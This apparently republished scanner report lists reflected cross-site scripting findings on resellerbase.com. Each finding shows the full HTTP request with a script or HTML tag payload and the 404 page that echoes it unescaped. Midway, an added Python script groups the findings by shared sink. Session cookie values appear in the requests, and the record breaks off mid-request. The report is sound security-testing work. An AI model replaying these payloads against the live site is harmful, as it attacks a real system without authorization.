X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes4de27<script>alert(1)</script>2ca2e0f965a/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3245. http://www.resellerbase.com/detail/45/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3f717<script>alert(1)</script>e551f3eb0b4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos3f717<script>alert(1)</script>e551f3eb0b4/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos3f717<script>alert(1)</script>e551f3eb0b4/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3246. http://www.resellerbase.com/detail/45/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload aedae<script>alert(1)</script>f6eefadf1ad was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/search.phpaedae<script>alert(1)</script>f6eefadf1ad?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/search.phpaedae<script>alert(1)</script>f6eefadf1ad?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3247. http://www.resellerbase.com/detail/45/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload e0d69<a>fa7fb88e4a2 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. The response below shows the probe in the same 404 sink ("The requested URL ... was not found on this server") that reflects the script payloads in the REST URL parameter findings for this path, so the manual check is a retest of this parameter against that sink with the script payload, not a search for a new reflection point.

Request

GET /detail/45/themes/kosmos/search.php?keyword=search...&Submit3=Searche0d69<a>fa7fb88e4a2&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/search.php?keyword=search...&Submit3=Searche0d69<a>fa7fb88e4a2&opt=2 was not found on this server.</p>
...[SNIP]...

2.3248. http://www.resellerbase.com/detail/45/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 796a6<a>61023883201 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/themes/kosmos/search.php?keyword=search...796a6<a>61023883201&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/search.php?keyword=search...796a6<a>61023883201&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3249. http://www.resellerbase.com/detail/45/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bb816<script>alert(1)</script>8e676af9abf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&bb816<script>alert(1)</script>8e676af9abf=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&bb816<script>alert(1)</script>8e676af9abf=1 was not found on this server.</p>
...[SNIP]...

2.3250. http://www.resellerbase.com/detail/45/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload fff89<a>e864012dc29 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2fff89<a>e864012dc29 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2fff89<a>e864012dc29 was not found on this server.</p>
...[SNIP]...
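Triage logic for a report of this shape, as an added example that is not part of the XSS.CX output or of Burp Suite: every finding above reflects the request-target inside the same sentence of the server's 404 page, so a reviewer wants them collapsed to one root cause with a list of entry points before anything is filed. The script parses a condensed transcript of findings, masks the payload and the URL-shaped token in the reflecting line to get a sink signature, and groups on it. `SAMPLE` is constructed: five records condensed from findings on this page plus one record for `app.example` (not a real site, with a made-up search-results sink) so that a second group appears; `parse_findings`, `sink_signature` and `triage` are names chosen here.

```python
"""Collapse scanner findings that share one reflection sink.

Added example for this report; not code from the XSS.CX scan or Burp Suite.
SAMPLE is a constructed, condensed transcript: five findings from the report
plus one constructed finding on app.example (not a real site) that uses a
different sink, so the grouping has something to separate.
"""
import re
from collections import Counter

SAMPLE = """\
2.3243. http://www.resellerbase.com/detail/45/themes/kosmos/search.php [REST URL parameter 2]
Confidence: Certain
Payload: 9e634<script>alert(1)</script>a5d38bf50c9
<p>The requested URL /detail/459e634<script>alert(1)</script>a5d38bf50c9/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>

2.3247. http://www.resellerbase.com/detail/45/themes/kosmos/search.php [Submit3 parameter]
Confidence: Firm
Payload: e0d69<a>fa7fb88e4a2
<p>The requested URL /detail/45/themes/kosmos/search.php?keyword=search...&Submit3=Searche0d69<a>fa7fb88e4a2&opt=2 was not found on this server.</p>

2.3249. http://www.resellerbase.com/detail/45/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]
Confidence: Certain
Payload: bb816<script>alert(1)</script>8e676af9abf
<p>The requested URL /detail/45/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&bb816<script>alert(1)</script>8e676af9abf=1 was not found on this server.</p>

2.3259. http://www.resellerbase.com/detail/46/ [REST URL parameter 1]
Confidence: Certain
Payload: 2bab7<script>alert(1)</script>0daf7e86c24
<p>The requested URL /detail2bab7<script>alert(1)</script>0daf7e86c24/46/ was not found on this server.</p>

2.3263. http://www.resellerbase.com/detail/46/hubshout-com.html [REST URL parameter 2]
Confidence: Firm
Payload: 4f8a0<a>4be4ea51f91
<p>The requested URL /detail/464f8a0<a>4be4ea51f91/hubshout-com.html was not found on this server.</p>

9.1. http://app.example/search [q parameter]
Confidence: Certain
Payload: c0ffee<script>alert(1)</script>c0ffee
<h2>Results for c0ffee<script>alert(1)</script>c0ffee</h2>
"""

HEADING = re.compile(r"^(?P<id>\d+(?:\.\d+)+)\. (?P<url>\S+) \[(?P<entry>[^\]]+)\]$")


def parse_findings(text):
    """Split the transcript into one dict per finding (id, url, entry point,
    confidence, payload and the response line that reflects the payload)."""
    findings = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = block.splitlines()
        m = HEADING.match(lines[0])
        if not m:
            continue
        f = m.groupdict()
        for line in lines[1:]:
            if line.startswith("Confidence:"):
                f["confidence"] = line.split(":", 1)[1].strip()
            elif line.startswith("Payload:"):
                f["payload"] = line.split(":", 1)[1].strip()
            elif f.get("payload") and f["payload"] in line:
                f["sink_line"] = line
        findings.append(f)
    return findings


def sink_signature(finding):
    """The reflecting line with the payload and any whitespace-preceded
    URL-shaped token masked, so findings that differ only in where the
    payload sat inside the request-target compare equal."""
    line = finding["sink_line"].replace(finding["payload"], "{payload}")
    return re.sub(r"\s/\S+", " {request-target}", line)


def triage(text):
    """Group findings by sink signature; largest group first."""
    groups = {}
    for f in parse_findings(text):
        g = groups.setdefault(sink_signature(f), {
            "members": [], "entry_points": set(), "confidence": Counter()})
        g["members"].append(f["id"])
        g["entry_points"].add(f["entry"])
        g["confidence"][f["confidence"]] += 1
    return sorted(({"sink": sig, **g} for sig, g in groups.items()),
                  key=lambda g: len(g["members"]), reverse=True)


if __name__ == "__main__":
    for g in triage(SAMPLE):
        print(f"{len(g['members'])} finding(s) -> {g['sink']}")
        print(f"   entry points: {sorted(g['entry_points'])}")
        print(f"   confidence:   {dict(g['confidence'])}")
```

On this page the first group holds every finding shown, Certain and Firm alike; the Firm entries differ only in the probe (`<a>` rather than `<script>`), so they are retests of the same sink rather than separate investigations. The remediation is one change to the error page, after which each recorded entry point is retested to confirm the group is closed.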

2.3251. http://www.resellerbase.com/detail/45/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a4e06<script>alert(1)</script>7e179956a96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila4e06<script>alert(1)</script>7e179956a96/45/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila4e06<script>alert(1)</script>7e179956a96/45/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3252. http://www.resellerbase.com/detail/45/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c19e8<script>alert(1)</script>428a97b2343 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45c19e8<script>alert(1)</script>428a97b2343/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45c19e8<script>alert(1)</script>428a97b2343/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3253. http://www.resellerbase.com/detail/45/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 96371<script>alert(1)</script>c9ee4c9acfe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes96371<script>alert(1)</script>c9ee4c9acfe/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes96371<script>alert(1)</script>c9ee4c9acfe/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3254. http://www.resellerbase.com/detail/45/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 36ab1<script>alert(1)</script>826926bf67c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/search.php36ab1<script>alert(1)</script>826926bf67c?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/search.php36ab1<script>alert(1)</script>826926bf67c?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3255. http://www.resellerbase.com/detail/45/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload deda1<a>be17d40ef09 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/themes/search.php?keyword=search...&Submit3=Searchdeda1<a>be17d40ef09&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/search.php?keyword=search...&Submit3=Searchdeda1<a>be17d40ef09&opt=2 was not found on this server.</p>
...[SNIP]...

2.3256. http://www.resellerbase.com/detail/45/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload e410a<a>77104e0fed was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/themes/search.php?keyword=search...e410a<a>77104e0fed&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/search.php?keyword=search...e410a<a>77104e0fed&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3257. http://www.resellerbase.com/detail/45/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 785ee<script>alert(1)</script>ff059c312c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/search.php?keyword=search...&Submit3=Search&opt=2&785ee<script>alert(1)</script>ff059c312c2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/search.php?keyword=search...&Submit3=Search&opt=2&785ee<script>alert(1)</script>ff059c312c2=1 was not found on this server.</p>
...[SNIP]...

2.3258. http://www.resellerbase.com/detail/45/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 83476<a>7613c2f542 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/themes/search.php?keyword=search...&Submit3=Search&opt=283476<a>7613c2f542 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/search.php?keyword=search...&Submit3=Search&opt=283476<a>7613c2f542 was not found on this server.</p>
...[SNIP]...

2.3259. http://www.resellerbase.com/detail/46/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2bab7<script>alert(1)</script>0daf7e86c24 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2bab7<script>alert(1)</script>0daf7e86c24/46/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2bab7<script>alert(1)</script>0daf7e86c24/46/ was not found on this server.</p>
...[SNIP]...

2.3260. http://www.resellerbase.com/detail/46/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a0f45<script>alert(1)</script>666e5a2a56c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46a0f45<script>alert(1)</script>666e5a2a56c/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
